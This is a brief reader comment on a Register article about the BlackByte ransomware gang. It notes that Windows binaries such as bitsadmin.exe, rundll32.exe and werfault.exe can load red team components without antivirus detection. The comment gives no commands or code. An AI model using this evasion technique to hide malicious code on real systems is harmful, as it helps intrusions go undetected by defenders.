Reply to post: Re: "living-off-the-land binaries"

Hot glare of the spotlight doesn’t slow BlackByte ransomware gang

Clausewitz4.0
Devil

Re: "living-off-the-land binaries"

Bitsadmin.exe, rundll32.exe, werfault.exe and others can be invoked to load/side load your red team components without being detected or flagged as malicious by an AV.

Quite effective.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2022